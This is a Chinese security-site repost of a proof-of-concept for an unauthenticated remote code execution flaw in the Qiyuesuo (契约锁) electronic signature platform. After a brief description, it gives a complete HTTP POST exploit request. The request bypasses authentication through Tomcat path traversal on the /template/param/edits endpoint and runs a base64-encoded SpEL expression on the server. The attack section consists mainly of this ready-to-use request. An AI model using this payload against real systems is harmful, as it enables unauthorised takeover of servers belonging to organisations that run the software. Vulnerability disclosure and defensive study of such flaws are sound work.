契约锁电子签章平台edits远程代码执行漏洞 PoC

admin 2024年11月6日14:14:28评论31 views字数 698阅读2分19秒阅读模式

漏洞描述

契约锁电子签章平台 /contract/ukeysign/.%2e/.%2e/template/param/edits 接口处存在远程代码执行漏洞,未经身份验证的攻击者可通过tomcat对路径参数解析不正当的特性绕过权限认证在目标执行恶意代码,获取服务器权限。经过分析和研判,该漏洞利用难度低,可导致远程代码执行,建议尽快修复

漏洞利用

POST /contract/ukeysign/.%2e/.%2e/template/param/edits HTTP/1.1 
Host: 
User-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_15_7) 
AppleWebKit/537.36(KHTML,likeGecko)Chrome/113.0.0.0Safari/537.36 
Content-Type:application/json

{"id":"2","params":[{"expression":"vara=new 
org.springframework.expression.spel.standard.SpelExpressionParser();var 
b='SpEL表达式的base64编码';varb64=java.util.Base64.getDecoder();var
deStr=newjava.lang.String(b64.decode(b),'UTF-8');var 
c=a.parseExpression(deStr);c.getValue();"}]}

原文始发于微信公众号(土拨鼠的安全屋):1day | 契约锁电子签章平台edits远程代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月6日14:14:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   契约锁电子签章平台edits远程代码执行漏洞 PoChttps://cn-sec.com/archives/3362813.html

发表评论

匿名网友 填写信息